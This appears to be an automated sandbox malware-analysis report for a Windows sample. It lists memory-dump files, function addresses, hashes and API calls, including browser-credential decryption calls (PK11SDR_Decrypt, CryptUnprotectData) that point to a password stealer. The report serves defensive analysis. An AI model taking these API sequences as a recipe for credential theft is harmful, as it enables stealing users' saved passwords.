Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 36d3b83afa8ba159f8052800831299ca9278c1baaffa7c1a7c2f9b004f2fb17b
Instruction ID: 27967dbe976c505c8401c0ad4ccf3ba9af0cd0eab3e817d35481bb2a8c82c4ca
Opcode Fuzzy Hash: 36d3b83afa8ba159f8052800831299ca9278c1baaffa7c1a7c2f9b004f2fb17b
Instruction Fuzzy Hash: DFF190719101189AEB59FB64CC95AEE7338FF15300F8441E9A41BA2991EF346F8ACF53

Function 0089C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0089C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0089C87C
PK11_GetInternalKeySlot.NSS3 ref: 0089C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0089C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0089C8EB
lstrcat.KERNEL32(?,008B0B46), ref: 0089C943
lstrcat.KERNEL32(?,008B0B47), ref: 0089C957
PK11_FreeSlot.NSS3(?), ref: 0089C961
lstrcat.KERNEL32(?,008B0B4E), ref: 0089C978

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: d36fd67f9836f215482e7de72ba469c73731f1d2ffef8b23c35905e221e09999
Instruction ID: e9ed8d3b8b0f11c4ff4a62694557de57498f9cae80b2bd713fefc89d2692d8e3
Opcode Fuzzy Hash: d36fd67f9836f215482e7de72ba469c73731f1d2ffef8b23c35905e221e09999
Instruction Fuzzy Hash: 78419F7590421ADFDB10DFA0CC88BEEBBB8FB48304F1041A9E50AA6280D7755A85CF91

Function 00C58549 Relevance: 12.9, Strings: 9, Instructions: 1645COMMON

Download Yara Rule

Strings

2S~, xrefs: 00C58E00
:<_n, xrefs: 00C58B15
V??, xrefs: 00C5960E
R]mv, xrefs: 00C58BF1
W(/], xrefs: 00C589E8
zssw, xrefs: 00C595B6
W??, xrefs: 00C59609
5 "z, xrefs: 00C58C75
XBq, xrefs: 00C5934A

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2S~$5 "z$:<_n$R]mv$V??$W(/]$W??$zssw$XBq
API String ID: 0-3946973362
Opcode ID: 7c99191e6124a42dd1a6a33363ec791dedcb85d4b518b02b5c25c6e045e1332e
Instruction ID: 34f7118865a8792817aaf573e4ad6785077497b6d1afcd87ef1c8ebeccd33854
Opcode Fuzzy Hash: 7c99191e6124a42dd1a6a33363ec791dedcb85d4b518b02b5c25c6e045e1332e
Instruction Fuzzy Hash: 43B207F360C2049FE3046E2DEC8567ABBE9EF94320F1A463DEAC5C7744EA7558018697

Function 00C6419C Relevance: 11.6, Strings: 8, Instructions: 1571COMMON

Download Yara Rule

Strings

+l);, xrefs: 00C64582
&#Bd, xrefs: 00C644CC
)==, xrefs: 00C642D5
#(Z~, xrefs: 00C648DB
h7], xrefs: 00C64761
*l);, xrefs: 00C6454F
%x, xrefs: 00C64926
{eq, xrefs: 00C64F66

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %x$#(Z~$&#Bd$)==$*l);$+l);$h7]${eq
API String ID: 0-708208923
Opcode ID: 728fc60bc014bad26db9e70043ae2f4c871ec82051b742685849ef2b0dcf87e4
Instruction ID: f8c4ea9f1d037915c949094e8927d262ea3589ba056612fc99bf471431ee55d7
Opcode Fuzzy Hash: 728fc60bc014bad26db9e70043ae2f4c871ec82051b742685849ef2b0dcf87e4
Instruction Fuzzy Hash: 8DB2D4F3A0C6009FE304AE2DEC8566AFBE5EF94720F1A493DE6C4C3744E67598418697

Function 00C5F233 Relevance: 10.3, Strings: 7, Instructions: 1532COMMON

Download Yara Rule

Strings

wYoM, xrefs: 00C600AC
6(J, xrefs: 00C5FA58
z]RL, xrefs: 00C5F3A2
jr, xrefs: 00C5F8C5
IPzd, xrefs: 00C5FAF9
pW{, xrefs: 00C6018D
2:k, xrefs: 00C5F3D7

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2:k$6(J$IPzd$jr$pW{$wYoM$z]RL
API String ID: 0-4244294947
Opcode ID: 4c1ccc596f425485095c54a2f15777bcea55c09d53c4cfc5a9b3bbcbfff0dd6b
Instruction ID: 7c41617e8571e632b612e77cf818ffb9326a18a89bd13c3f5ca834bdc182904b
Opcode Fuzzy Hash: 4c1ccc596f425485095c54a2f15777bcea55c09d53c4cfc5a9b3bbcbfff0dd6b
Instruction Fuzzy Hash: BDA2D6F360C204AFE714AE29EC8577EFBE5EF94720F1A492DEAC483740E63558148697

Function 00C56A86 Relevance: 9.1, Strings: 6, Instructions: 1575COMMON

Download Yara Rule

Strings

M}V, xrefs: 00C572D2
ts{, xrefs: 00C570F4
yS}c, xrefs: 00C57407
[327, xrefs: 00C56E75
[YRv, xrefs: 00C56F1E
8, xrefs: 00C5750B

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 8$M}V$[327$[YRv$ts{$yS}c
API String ID: 0-2116723827
Opcode ID: 1cdebf2eca0677c9c6be72ea5dafb50dc10d1105497a03edaae5c86a3772a8e0
Instruction ID: 589a265176ab19fac3a2aa71dcd1ee036f57ba8f8470447a614c3aecd84e3a5d
Opcode Fuzzy Hash: 1cdebf2eca0677c9c6be72ea5dafb50dc10d1105497a03edaae5c86a3772a8e0
Instruction Fuzzy Hash: BDB205F3A0C200AFE3046E29EC8567ABBE5EF94720F16893DEAC5C7744E63558458793

Function 00C5D784 Relevance: 7.8, Strings: 5, Instructions: 1597COMMON

Download Yara Rule

Strings

|hP, xrefs: 00C5E147
foe, xrefs: 00C5E72A
_YN, xrefs: 00C5D82C
ZFu?, xrefs: 00C5DF35
D3[B, xrefs: 00C5D832

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: D3[B$ZFu?$foe$|hP$_YN
API String ID: 0-2087406490
Opcode ID: 6feb39244ed6ab042a553f6710dbb59ba4b9b696b4a5fbbaff63cc7370cb781e
Instruction ID: 16d8ca3eb70a997b82dd8336eb8619ab12959c6b30909d6b4ab02d0e5356bd43
Opcode Fuzzy Hash: 6feb39244ed6ab042a553f6710dbb59ba4b9b696b4a5fbbaff63cc7370cb781e
Instruction Fuzzy Hash: F1B226F360C2049FE304AE2DEC8567ABBE9EF94720F1A4A3DE6C4C7744E63558058697

Function 00897240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0089724D
RtlAllocateHeap.NTDLL(00000000), ref: 00897254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00897281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008972A4
LocalFree.KERNEL32(?), ref: 008972AE

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 1f99376b2fa2b7489d0c93eead191f49fe50ef9e6b19ae0078e3d7d9a8ede5a1
Instruction ID: 6ea34534e5acc3714c5a4d762680915a78f31059d61f3a8095eacc5b6dda6c45
Opcode Fuzzy Hash: 1f99376b2fa2b7489d0c93eead191f49fe50ef9e6b19ae0078e3d7d9a8ede5a1
Instruction Fuzzy Hash: 7101E9B5A41208BBEB10DFD4CD4AF9E77B8EB44B04F104155FB06EA2C0D6B0AA019BA5

Function 00C55495 Relevance: 7.5, Strings: 5, Instructions: 1234COMMON

Download Yara Rule

Strings

uv<, xrefs: 00C562C3
,j^e, xrefs: 00C55517
="u, xrefs: 00C5636B
G]~,, xrefs: 00C563AF
]X, xrefs: 00C55EEA

Memory Dump Source

